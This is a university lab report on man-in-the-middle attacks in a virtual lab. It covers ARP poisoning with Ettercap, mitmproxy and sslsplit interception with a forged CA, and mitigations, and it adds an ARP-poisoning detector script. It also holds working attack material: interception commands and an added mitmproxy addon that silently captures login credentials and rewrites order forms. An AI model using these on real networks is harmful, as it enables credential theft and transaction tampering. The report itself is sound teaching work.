
University of Trento

MAN IN THE MIDDLE ATTACK

Authors: Muvhunzwi Peacemaker, Addis Abebe Feyso, Samuel Birhanu
Supervisor: Bruno Crispo

May 15, 2017


Contents
1 Introduction

2 Environment Setup
2.1 Ettercap
2.1.1 Installation of Ettercap graphical
2.2 MitmProxy
2.2.1 Installation of Mitmproxy
2.3 SSLsplit
2.3.1 Installation of sslsplit
2.4 Apache web server
2.4.1 Installation of Apache, MySQL and PHP
2.5 Websites

3 Protocol detail
3.1 HTTP Protocol
3.2 HTTPS Protocol

4 Attack-1
4.1 Address Resolution Protocol (ARP)

5 Attack-2
5.1 Transport Layer Security
5.2 Secure Sockets Layer

1 Introduction
One of the most common network attacks against both individuals and large organizations is the man-in-the-middle (MITM) attack. The attacker places itself between two communicating parties and relays messages between them. Each party believes it is talking directly to the other user or server, while in reality all traffic flows through the attacker's machine. As a result the attacker can not only intercept sensitive data but can also inject into and manipulate the data stream to gain further control over the victim. The purpose of this lab is to introduce the concept of the man-in-the-middle attack and the tools used for it, and to give a general idea of how the attack is performed in realistic scenarios. At the end of the lab we outline mitigation techniques that can be used to prevent this kind of attack. MITM attacks take different forms, such as ARP poisoning, eavesdropping, Wi-Fi WEP/WPA/WPA2 cracking, DNS spoofing and port stealing.

In this lab we implement the most widely used forms of MITM attack: ARP poisoning, and eavesdropping on and tampering with the HTTP and HTTPS protocols.

2 Environment Setup
In this lab you will insert yourself in the middle of a connection between a client and a server to perform a man-in-the-middle (MitM) attack. The attack is carried out in a virtual environment built with VirtualBox. Three virtual machines are used: one is the server, one is the client and the third is the attacker. All three are attached to the same virtual network, which is what allows the attacker to poison the ARP caches of the other two. In detail we have:

A server running Ubuntu 16.04 LTS with IP address 192.168.0.1 and MAC address 08:00:27:9c:07:2b

A client running Ubuntu 16.04 LTS with IP address 192.168.0.2 and MAC address 08:00:27:6c:d6:77

An attacker running Ubuntu 16.04 LTS with IP address 192.168.0.3 and MAC address 08:00:27:7d:ac:89

2.1 Ettercap
Ettercap provides many features for network and host analysis. It offers four modes of operation:

IP-based: packets are filtered based on IP source and destination

MAC-based: packets are filtered based on MAC address, useful for sniffing connections through a gateway

ARP-based: uses ARP poisoning to sniff on a switched LAN between two hosts (full-duplex)

Public ARP-based: uses ARP poisoning to sniff on a switched LAN from a victim host to all other hosts (half-duplex)

This lab uses the ARP-based mode between the client and the server.

2.1.1 Installation of Ettercap graphical
To install ettercap-graphical on the attacker virtual machine:
Step 1: Update the package index
$ sudo apt-get update
Step 2: Install ettercap-graphical
$ sudo apt-get install ettercap-graphical

2.2 MitmProxy
Mitmproxy is an open source proxy that intercepts HTTP connections between any HTTP client and a web server, in the classic man-in-the-middle position: it accepts connections from clients and forwards them to the destination server. Its goal is to let the operator monitor, capture and alter these connections in real time.
For plain-text HTTP connections, mitmproxy accepts a connection from the HTTP client, displays the request to the attacker on screen, and forwards the request to the destination web server once the attacker confirms it, possibly after adjusting it. mitmproxy simply acts as the middle man: to the client it looks as if the mitmproxy host were merely relaying its connection, and to the server the mitmproxy host looks like the client. In this lab it is run in transparent mode, so the client needs no proxy configuration; the traffic is steered to it with ARP poisoning and an iptables redirect instead.

2.2.1 Installation of Mitmproxy
The first step to install mitmproxy on the attacker virtual machine is to install pip3, python3-dev and the development libraries it builds against, using the following command
$ sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
The second step is to install mitmproxy itself with pip
$ sudo pip3 install mitmproxy
This installs the current release from PyPI; the command-line flags used later in this lab are those of mitmproxy 2.x, the release current in 2017.

2.3 SSLsplit
SSLsplit is a tool for man-in-the-middle attacks against encrypted SSL/TLS connections such as HTTPS. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates the SSL/TLS connection from the client and initiates a new SSL/TLS connection to the original destination address, while storing all the data transmitted in log files. SSLsplit thus acts as a middle man between the client and the actual server whenever traffic is redirected to the host it runs on, either by changing the victim's default gateway or by ARP spoofing. It picks up SSL/TLS connections and pretends to be the server the client is connecting to. To do so it dynamically generates a certificate for that server's name and signs it with the private key of a CA certificate; the attack only succeeds if the client trusts that CA, or if the user overrides the browser warning.

2.3.1 Installation of sslsplit
The first step to install sslsplit on the attacker virtual machine is to download the SSLsplit source archive and extract it as follows:
$ wget http://mirror.roe.ch/rel/sslsplit/sslsplit-0.4.7.tar.bz2
$ bunzip2 sslsplit-0.4.7.tar.bz2
$ tar xvf sslsplit-0.4.7.tar
Then install the build dependencies and compile the source code:
$ sudo apt-get install libssl-dev libevent-dev
$ cd sslsplit-0.4.7
$ make
The binary is left in the source directory as ./sslsplit; the commands in Attack-2 are run from there.

2.4 Apache web server

Apache is web server software that enables a computer to host one or more websites that can be accessed over the Internet with a web browser. It runs in the background on an operating system that supports multitasking and serves the applications that connect to it, such as client web browsers.

2.4.1 Installation of Apache, MySQL and PHP

To install Apache, we first install the package apache2 by running the following command
$ sudo apt-get install apache2
To install MySQL, we install the package mysql-server by running the following command
$ sudo apt-get install mysql-server
To install PHP, we install the packages php5 and libapache2-mod-php5 as follows
$ sudo apt-get install php5 libapache2-mod-php5
Note that Ubuntu 16.04 ships PHP 7.0 and no longer carries the php5 packages; on that release the packages are named php and libapache2-mod-php instead.

2.5 Websites
To demonstrate the MITM attack we created a shopping website where the client has to log in and fill in some details to complete an order. This is the information that the attacker will read and manipulate.
We hosted an HTTP website and an HTTPS website on the server virtual machine: http://shop.com is the HTTP website and https://ssl.shop.com is the HTTPS website.
We generated a self-signed X.509 certificate for the domain ssl.shop.com, moved the .crt file into /etc/ssl/certs and the .key file into /etc/ssl/private. We also added the IP address and domain names of the websites to the hosts file (/etc/hosts) of the client and attacker virtual machines, so these domains are resolved locally without DNS. The Apache configuration files for the two virtual hosts were copied to the /etc/apache2/sites-enabled directory. The web application itself was set up in the /var/www/shop.com/public_html and /var/www/ssl.shop.com/public_html folders.
To manage the MySQL database for the websites we installed phpMyAdmin on the server virtual machine. phpMyAdmin is a MySQL database management tool available for Windows and Linux. To log in to phpMyAdmin use username root and password 123456.

3 Protocol detail
3.1 HTTP Protocol
The Hypertext Transfer Protocol (HTTP) is an application-level protocol of the TCP/IP protocol suite used to deliver data on the World Wide Web. The default port is TCP 80, but other ports can be used as well. HTTP is a stateless protocol: the server and the client are aware of each other only for the duration of the current request. It is a request/response protocol based on the client/server model. The HTTP client sends a request consisting of a request method, a URI and a protocol version, followed by headers and an optional body; the server responds with a status line containing the protocol version and a success or error code, followed by its own headers and body. HTTP and HTTPS share the same request methods, among them GET and POST. The GET method requests a representation of the specified resource and should only retrieve data that already exists on the server (or return an error); the POST method asks the server to accept the data enclosed in the body of the request, for example a submitted login or order form, and usually to store it as a new resource. The major drawback of HTTP is that all communication is in plain text and can be read and altered by a man in the middle who manages to get into the path between client and server. For secure web communication we need to use HTTPS.

3.2 HTTPS Protocol

Hypertext Transfer Protocol Secure (HTTPS) is the secure version of HTTP, the protocol over which data is sent between your browser and the server it is connected to: all communication is encrypted. It is used to protect confidential online transactions such as online banking and online shopping order forms. HTTPS carries HTTP over one of two security protocols, SSL (Secure Sockets Layer) or its successor TLS (Transport Layer Security). Both use public-key cryptography together with a public key infrastructure (PKI). In a public-key system each party has a key pair, a public key and a private key: data encrypted with the public key can only be decrypted with the private key, and a signature made with the private key can be verified by anyone holding the public key. This is what allows a client to verify that it is talking to the genuine server.
What is an HTTPS certificate?
Certificates are necessary for every HTTPS connection. When a client requests an HTTPS connection to a server, the server sends its X.509 (SSL) certificate to the client. The certificate contains the server's public key together with its name, signed by a certificate authority (CA). The client checks that the signature chains to a CA it trusts and that the name matches the host it intended to reach; only then does the handshake continue with the generation of the shared secrets that protect the session. When a certificate that passes these checks is used, the browser shows a padlock icon in the address bar. Attack-2 below works precisely by presenting a certificate that fails the chain check and relying on the user to override the warning.

4 Attack-1
In this attack we demonstrate an attack on the HTTP protocol using Ettercap, mitmproxy and the website http://shop.com. We also introduce ARP poisoning, the basic building block of this attack.
Step 1 After verifying that the machines can reach each other, check the ARP tables of the virtual machines (arp -a).

Before the attack, each virtual machine's ARP table on the interface enp0s3 maps the other two hosts to their own, distinct IP and MAC addresses.
Step 2: Start Ettercap with the graphical interface using the command below on the attacker virtual machine
$ sudo ettercap -G

4.1 Address Resolution Protocol (ARP)
ARP (RFC 826) lets systems on the same LAN map an IP address to a MAC address. Each system keeps an ARP cache (look-up table) recording which IP addresses are associated with which MAC addresses. When sending a packet to an IP address, the system first consults this table to see whether it already knows the MAC address; if not, it asks the network. ARP cache entries are created either by the ARP request/reply mechanism or by gratuitous ARP. In the request/reply mechanism the sender broadcasts a request containing the IP address of the receiver, and the receiver replies with its MAC address. With gratuitous ARP a machine broadcasts its own IP and MAC address unsolicited, for example after booting, and the other hosts update their caches.
What is ARP poisoning?
ARP replies and gratuitous ARP messages are not authenticated and require no confirmation: a host accepts them without checking that they came from the rightful owner of the IP address. An attacker can therefore send forged ARP messages over the network that bind the attacker's MAC address to the IP address of another host. Every other host then sends traffic for that IP address to the attacker, who can read or alter it before forwarding it to the real destination.
Step 3: To perform the ARP poisoning using Ettercap

On the Ettercap window go to Sniff on the upper menu bar

Select Unified sniffing

Confirm the network interface enp0s3, which is the network interface of the VM, by clicking OK

After pressing OK on the window that appears, go to Hosts on the upper menu bar

Select Scan for Hosts

Click on the Hosts option on the upper menu bar again

Select Hosts List

You should now see the IP addresses of the client and the server along with their MAC addresses

Click on the server IP address (192.168.0.1) and click Add to Target 1

Click on the client IP address (192.168.0.2) and click Add to Target 2

On the Ettercap window go to Mitm on the upper menu bar

Select ARP poisoning

Tick the Sniff remote connections option under the optional parameters

Click OK

Repeat this for each target

Ettercap now keeps sending forged ARP replies to both targets, telling the client that 192.168.0.1 is at the attacker's MAC address and the server that 192.168.0.2 is at the attacker's MAC address.

Step 4
Check the ARP tables of the client and the server virtual machines by typing arp -a

After the ARP poisoning attack we can see that, on each victim, the entry for the other victim now carries the attacker's MAC address (08:00:27:7d:ac:89): two different IP addresses map to the same MAC address, so our attack was a success. Frames the client sends to 192.168.0.1 and frames the server sends to 192.168.0.2 now both arrive at the attacker.

Are there ways to mitigate ARP poisoning?
One solution to prevent the ARP cache from being poisoned, and thereby protect against ARP spoofing, is to add static IP-to-MAC entries to the cache. A static entry is not updated by incoming ARP replies, unlike a dynamic entry.
We can set a static entry for the server on the client machine with the following command
$ sudo arp -s 192.168.0.1 08:00:27:9c:07:2b

ARP poisoning of that entry no longer works once it is static. Note that the entry must be added on both victims (the server needs one for the client as well, otherwise the reverse direction is still poisoned), that it is lost on reboot, and that maintaining static entries does not scale beyond a small lab network. Another solution is to use an Intrusion Detection System (IDS) that watches ARP traffic and alerts when the MAC address bound to an IP address changes.
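The following Python program, added here as an illustration and not part of the original lab, shows what such an IDS check looks like. It parses raw Ethernet/ARP frames in the RFC 826 layout, learns IP-to-MAC bindings the way a host's cache does, and raises an alert when a binding changes or when a frame's Ethernet source address disagrees with the sender address inside the ARP payload (a host answering for itself fills both with its own MAC). Entries passed as static behave like arp -s entries. The frames are constructed inside the script from the lab's own addresses (server 192.168.0.1, client 192.168.0.2, attacker 192.168.0.3); in a real deployment they would come from a raw socket or a pcap file, which is outside the example.

```python
"""ARP poisoning detector (added example, not part of the lab).

Parses raw Ethernet/ARP frames (RFC 826 layout) and alerts when the MAC
address bound to an IP address changes, which is the trace the lab's attack
leaves in the victims' ARP caches.  All frames below are constructed from
the lab's addresses; no real network is touched.
"""
import struct
from ipaddress import IPv4Address

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
ETH_HDR = struct.Struct("!6s6sH")           # dst MAC, src MAC, EtherType
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa

# Lab hosts (from the Environment Setup section).
SERVER = ("192.168.0.1", "08:00:27:9c:07:2b")
CLIENT = ("192.168.0.2", "08:00:27:6c:d6:77")
ATTACKER = ("192.168.0.3", "08:00:27:7d:ac:89")


def mac_bytes(text):
    return bytes.fromhex(text.replace(":", ""))


def mac_text(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(eth_src, eth_dst, op, sha, spa, tha, tpa):
    """Build one Ethernet frame carrying an ARP message (used to construct test traffic)."""
    eth = ETH_HDR.pack(mac_bytes(eth_dst), mac_bytes(eth_src), ETH_P_ARP)
    arp = ARP_HDR.pack(1, 0x0800, 6, 4, op,
                       mac_bytes(sha), IPv4Address(spa).packed,
                       mac_bytes(tha), IPv4Address(tpa).packed)
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of a frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size:
        return None
    _dst, src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"eth_src": mac_text(src), "op": op,
            "sha": mac_text(sha), "spa": str(IPv4Address(spa)),
            "tha": mac_text(tha), "tpa": str(IPv4Address(tpa))}


class ArpWatcher:
    """Tracks IP -> MAC bindings like an ARP cache and reports changes.

    Entries given in `static` behave like `arp -s` entries: they are never
    overwritten, but an attempt to change them is still reported.
    """

    def __init__(self, static=None):
        self.static = dict(static or {})
        self.table = dict(self.static)
        self.alerts = []

    def feed(self, frame):
        """Process one frame; return an alert string, or None if nothing is suspicious."""
        arp = parse_arp(frame)
        if arp is None:
            return None
        alert = None
        if arp["eth_src"] != arp["sha"]:
            alert = f"ARP sender {arp['sha']} for {arp['spa']} sent from {arp['eth_src']}"
        else:
            known = self.table.get(arp["spa"])
            if known is None:
                self.table[arp["spa"]] = arp["sha"]      # first sighting: learn it
            elif known != arp["sha"]:
                alert = f"{arp['spa']} changed from {known} to {arp['sha']}"
                if arp["spa"] not in self.static:
                    self.table[arp["spa"]] = arp["sha"]  # a dynamic cache gets poisoned
        if alert:
            self.alerts.append(alert)
        return alert


def lab_traffic():
    """Constructed frame sequence: two legitimate replies, then Ettercap-style poisoning."""
    (sip, smac), (cip, cmac) = SERVER, CLIENT
    amac = ATTACKER[1]
    return [
        build_arp(smac, cmac, ARP_REPLY, smac, sip, cmac, cip),  # server answers client
        build_arp(cmac, smac, ARP_REPLY, cmac, cip, smac, sip),  # client answers server
        build_arp(amac, cmac, ARP_REPLY, amac, sip, cmac, cip),  # attacker claims server IP
        build_arp(amac, smac, ARP_REPLY, amac, cip, smac, sip),  # attacker claims client IP
    ]


def run_demo(static=None):
    """Feed the constructed traffic to a watcher and return it (alerts in .alerts)."""
    watcher = ArpWatcher(static)
    for frame in lab_traffic():
        watcher.feed(frame)
    return watcher


if __name__ == "__main__":
    for line in run_demo().alerts:
        print("ALERT:", line)
```

Run on the constructed traffic, the watcher reports the two forged replies, one per victim IP; with the server's binding declared static its table keeps the genuine MAC while still reporting the attempt, which is the behaviour the arp -s mitigation above relies on.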
Step 5 Redirecting the traffic
By default mitmproxy listens on TCP port 8080. To allow interception we redirect all incoming HTTP traffic to port 8080, where mitmproxy listens, and all incoming HTTPS traffic to port 8443, where sslsplit will listen in Attack-2. Because the poisoned hosts now send each other's packets to the attacker's MAC address, those packets arrive on the attacker's enp0s3 and pass through the nat PREROUTING chain, which is where the REDIRECT target can divert them to a local port.
To activate IP forwarding use the command below
$ sudo sysctl -w net.ipv4.ip_forward=1
We flush any previous entries from the nat table to prevent conflicting rules
$ sudo iptables -t nat -F
Next we redirect all incoming HTTP traffic to port 8080
$ sudo iptables -t nat -A PREROUTING -i enp0s3 -p tcp --dport 80 -j REDIRECT --to-port 8080
Finally we redirect all incoming HTTPS traffic to port 8443
$ sudo iptables -t nat -A PREROUTING -i enp0s3 -p tcp --dport 443 -j REDIRECT --to-port 8443
Note that the flush removes every NAT rule on the attacker VM, not only the lab's, and that neither the sysctl setting nor the rules survive a reboot.

Step 6 Start Mitmproxy

On the attacker virtual machine start mitmproxy in transparent mode by typing the following command.
$ sudo mitmproxy -T --host
The -T flag selects transparent mode and --host makes mitmproxy show the destination host name rather than the IP address in the flow list (mitmproxy 2.x syntax; in mitmproxy 3 and later the equivalent is --mode transparent --showhost).

Step 7 On the client machine open the web browser and go to http://shop.com. On the login page enter the user name and password given as

Username: user

Password: 123456

Step 8 Sniffing the conversation

Go to the attacker virtual machine to see the whole conversation between the client and the server in mitmproxy. Because the login form is submitted over plain HTTP, the username and password appear in clear in the request.

In the image above we can see the information exchanged between the client and the server. The attacker obtains all the sensitive data of the communication and all the details of the conversation, such as the port number, the protocol version and the headers exchanged to establish the connection.
Step 9 Modifying the conversation

Mitmproxy allows you to intercept the traffic and modify the information.

To set an intercept filter in mitmproxy, press i.

Use .* as the intercept filter and press Enter. This intercepts all requests and responses, which are held until you release them.

Go back to the client VM and visit http://shop.com

On the attacker VM the intercepted requests appear in orange in mitmproxy, as shown below.

To forward an intercepted request to the server (or an intercepted response to the client), select it and press a (accept).

In the client browser, enter your information to confirm the purchase and the delivery.

To edit the sensitive information on the attacker VM, select the intercepted request, press e (edit) and then q to edit the query parameters.

Use the arrow keys to navigate to the value you want to edit.

Press Enter and modify the value.

After modifying it press Esc and move down to the next value using the arrow keys.

Once you have finished editing, press q to go back, then accept the request and the response.

To check whether the changes took effect, look at the client web browser.

As shown in the client browser, mitmproxy managed to modify the information. In a real attack, however, the attacker would also modify the server's response so that the client sees the values it originally entered and is unaware of the changes. This concludes our first attack, on the HTTP protocol, and it was a success.
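Editing every intercepted request by hand, as in steps 8 and 9, does not scale and is visible as a delay to the victim. The following mitmproxy addon, added here as an example and not part of the lab or of mitmproxy itself, automates both steps: it records the credentials from the login form and silently rewrites chosen fields of the order form before the request is forwarded, so the client sees no interruption. It is loaded with the -s flag (sudo mitmproxy -T --host -s order_tamper.py). The form field names (username, password, address, quantity) and the override values are assumptions about the lab's shop application; the mitmproxy calls used (the module-level request hook, flow.request.pretty_host, method, headers and content, and ctx.log) are the mitmproxy 2.x addon API. The pure helpers can be imported and tested without mitmproxy installed.

```python
"""mitmproxy addon automating steps 8 and 9 (added example, not part of the lab).

Loaded with  sudo mitmproxy -T --host -s order_tamper.py  (mitmproxy 2.x flags as
used in the lab).  For every form POST to shop.com it records the credentials and
rewrites chosen order fields before the request reaches the server.
The form field names are assumptions about the lab's shop application.
"""
from urllib.parse import parse_qsl, urlencode

try:
    from mitmproxy import ctx            # present only when mitmproxy loads the script
except ImportError:                      # lets the helpers be imported and tested elsewhere
    ctx = None

TARGET_HOST = "shop.com"
CREDENTIAL_FIELDS = ("username", "password")               # assumed login form fields
ORDER_OVERRIDES = {"address": "Via Sommarive 9, Trento",   # assumed order form fields
                   "quantity": "10"}
captured = []                                              # credentials seen so far


def is_form_post(method, headers):
    """True for a POST whose body is an HTML form (application/x-www-form-urlencoded)."""
    ctype = headers.get("content-type", "") or ""
    return method.upper() == "POST" and "application/x-www-form-urlencoded" in ctype.lower()


def extract_credentials(body):
    """Pick the login fields out of a form body; the lab sends them in clear over HTTP."""
    fields = dict(parse_qsl(body.decode("utf-8", "replace"), keep_blank_values=True))
    return {name: fields[name] for name in CREDENTIAL_FIELDS if name in fields}


def rewrite_form(body, overrides):
    """Replace the values of selected fields, keeping field order and untouched fields."""
    pairs = parse_qsl(body.decode("utf-8", "replace"), keep_blank_values=True)
    return urlencode([(k, overrides.get(k, v)) for k, v in pairs]).encode("utf-8")


def request(flow):
    """mitmproxy hook: called once per client request, before it is forwarded."""
    req = flow.request
    if req.pretty_host != TARGET_HOST or not is_form_post(req.method, req.headers):
        return
    creds = extract_credentials(req.content)
    if creds:
        captured.append(creds)
        if ctx is not None:
            ctx.log.warn(f"captured login {creds}")
    new_body = rewrite_form(req.content, ORDER_OVERRIDES)
    if new_body != req.content:
        req.content = new_body   # mitmproxy recomputes Content-Length for the new body
```

The rewrite keeps the original field order and leaves fields it does not know about untouched, so the server sees a request indistinguishable from a genuine one apart from the changed values. A real attacker would pair this with a response hook that puts the victim's original values back into the confirmation page, as noted above.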

What are the possible countermeasures to this kind of attack?

This attack is possible because HTTP provides no confidentiality and no authentication between server and client. It is therefore recommended to use HTTPS, the secured version of HTTP. There are three further ways to defend against a man-in-the-middle attack even without SSL/TLS on the website itself. Each of them encrypts the traffic between you and an endpoint you trust and includes some form of endpoint authentication. The first is a Virtual Private Network (VPN), a secure connection that extends a private network across a public network, so that the user benefits from the functionality, security and management policies of the private network. The second is a proxy server with data encryption, which encrypts the transmission between you and the proxy. The third is Secure Shell (SSH), a network protocol for remote administration of UNIX/Linux hosts. SSH is typically used to log in to a remote machine and execute commands, but it also supports tunnelling, forwarding TCP ports and X11 connections. An SSH tunnel is an encrypted tunnel created through an SSH connection; users may set up SSH tunnels to carry otherwise unencrypted traffic through an encrypted channel. Note that all three only protect the path between the client and the VPN, proxy or SSH endpoint: the traffic from that endpoint to the web server is still plain HTTP, so the endpoint must sit on a network the attacker cannot reach.

5 Attack-2
We will demonstrate an attack on the HTTPS protocol using Ettercap and sslsplit. The attack is carried out against https://ssl.shop.com, the HTTPS version of the shopping website. HTTPS is HTTP carried over TLS, or over its deprecated predecessor SSL, which encrypts and authenticates the information transmitted between the client and the server.

5.1 Transport Layer Security

Transport Layer Security (TLS) is a protocol that provides confidentiality and data integrity between two communicating applications. It is the most widely deployed security protocol in use today, used by web browsers and by other applications that need to exchange data securely over a network, such as file transfers, VPN connections, instant messaging and voice over IP. A TLS connection is confidential because the data transmitted is encrypted with symmetric cryptography. The keys for this symmetric encryption are generated uniquely for each connection from a shared secret negotiated in the handshake at the start of the session; the handshake also authenticates the server (and optionally the client) with public-key cryptography and certificates. The server and client agree on the encryption algorithm and keys before the first byte of application data is encrypted. Attack-2 does not break any of this: it makes the client complete a perfectly valid TLS handshake with the attacker instead of with the server.

5.2 Secure Sockets Layer

SSL is the predecessor of TLS, a security protocol used to set up encryption and to perform authentication; the name is still used loosely for both. SSL/TLS uses certificates, built on a public key and a private key, to perform authentication. In this lab we use HTTPS (HTTP over SSL/TLS) as the example of an SSL/TLS deployment. By checking the SSL certificate, web users can be confident that they are communicating with the right web server and not with an attacker pretending to be the server. A valid certificate is signed by a trusted Certificate Authority (CA) that is recognised by the browser. If an attacker presents a certificate of their own making, the browser warns the user that the certificate is not trustworthy, and the user should cancel the visit because of the possibility of a man-in-the-middle attack.

How to create and install a CA certificate

For SSLsplit to act as a middle man for SSL/TLS connections, it needs to be able to generate and sign server certificates that the victim trusts. The attacker therefore creates its own CA and, on the client machine, the attacker's root CA certificate has to be placed in the SSL directory (on Ubuntu this is done by copying ca.crt into /usr/local/share/ca-certificates/ and running update-ca-certificates, which links it into /etc/ssl/certs). This makes OpenSSL-based tools such as curl and wget trust the attacker's CA; Firefox keeps its own certificate store and continues to warn unless the CA is also imported into the browser, which is why the lab accepts the warning manually below. We used openssl to create the self-signed CA certificate with the following commands
$ sudo openssl genrsa -out ca.key 2048
$ sudo openssl req -new -x509 -days 365 -key ca.key -out ca.crt
The first command generates a 2048-bit RSA private key. The second command generates a self-signed X.509 certificate valid for 365 days; it prompts for the subject fields (country, organisation, common name), and whatever is entered there is what the victim sees as the issuer when viewing the forged certificate in the browser. With the ARP poisoning from Attack-1 running and the iptables rule for port 443 in place, we can implement the attack on HTTPS as follows

Step 1 create a directory for the connection files

$ sudo mkdir /tmp/sslsplit

$ sudo mkdir /tmp/sslsplit/logdir

Step 2 Start sslsplit on the attacker virtual machine

$ cd sslsplit-0.4.7

$ sudo ./sslsplit -D -l connections.log -j /tmp/sslsplit -S logdir -k ca.key -c ca.crt ssl 0.0.0.0 8443

Here -D runs sslsplit in the foreground with debug output, -l connections.log logs one line per intercepted connection, -j /tmp/sslsplit makes sslsplit chroot into that directory once it has started (so the per-connection content files written by -S logdir end up in /tmp/sslsplit/logdir), -k and -c give the CA key and certificate used to forge server certificates on the fly, and "ssl 0.0.0.0 8443" is the proxy specification: accept SSL/TLS connections on all interfaces on port 8443, the port to which the iptables rule from Attack-1 redirects HTTPS traffic. The original destination of each redirected connection is recovered from the kernel NAT table.

Step 3 Access the secure website https://ssl.shop.com on the client machine

As shown in the image above, the browser gives a warning because the certificate presented to it was generated by sslsplit and signed by the attacker's CA, which the browser does not trust. To ignore this warning, click Advanced > Add Exception > Confirm Security Exception. This click-through is the weakness the attack relies on: a user who refuses the exception is not affected. In this lab the warning is doubly easy to dismiss because the genuine ssl.shop.com certificate is itself self-signed, so the client sees a warning even without an attack and cannot tell the two cases apart; with a server certificate from a trusted CA the warning would appear only while the attack is running.

To see the certificate the attacker generated, in the client web browser click on the key (padlock) icon > click on the arrow pointing to the right > select More Information > click on View Certificate. The issuer shown is the subject entered when ca.crt was created, not a public CA.

Step 4 View the captured traffic in sslsplit
After the login details have been submitted on the website, sslsplit saves a log file for each connection, containing its requests and responses, in the /tmp/sslsplit/logdir directory we created.

To analyse this further use the following commands

$ cd /tmp/sslsplit/logdir

$ ls

To view the contents of a file, type

$ sudo cat

followed by a space, then press the Tab key: the shell lists the log file names, which all begin with a timestamp. Type the next two or three characters that are unique to the file you want, press Tab again to auto-complete the name and press Enter.

As shown in the image, sslsplit decrypted the HTTPS traffic and wrote it to the log as plain HTTP, capturing the username and password used by the client.

sslsplit also captured the other sensitive information sent by the client. This information can be modified with a MITM tool such as mitmproxy, as seen in Attack-1. Note what actually happened: the client still speaks HTTPS, but to sslsplit rather than to the server, and sslsplit opens its own HTTPS connection to the server. The encryption is not broken, it is terminated at the attacker, who sees the plaintext in between. The attack succeeded only because the client accepted a certificate signed by the attacker's CA.

How to prevent such kind of attack

Since this attack is also based on ARP poisoning, all the mitigation measures suggested before apply. Anyone can create a CA certificate with OpenSSL in two commands, so the existence of a certificate proves nothing by itself; what protects the user is that the browser only trusts certificates chaining to CAs in its store. Users should therefore take the warnings given by the browser seriously and not continue to the website, since the connection may be passing through a man in the middle. Users should also check the URL they are visiting: if it is secured by a certificate from a trusted CA, the browser shows a padlock or, in some browsers, a green URL bar. On the server side, HTTP Strict Transport Security (HSTS) lets a website declare itself accessible only via HTTPS; a browser that has seen the policy upgrades later http:// requests to https:// itself and no longer offers the "add exception" escape hatch for certificate errors, which removes the click-through this attack depends on. The Public Key Pinning Extension for HTTP (HPKP) went further and let a site declare fingerprints of the server or CA certificates allowed for it, so that a certificate from any other CA, including the attacker's, is rejected; it proved easy to misconfigure and has since been removed from the major browsers, so it should not be relied on today. Finally, when transferring sensitive information users should avoid public Wi-Fi hotspots, since some of them act as a man in the middle and steal or modify the information they route between the user and the Internet.
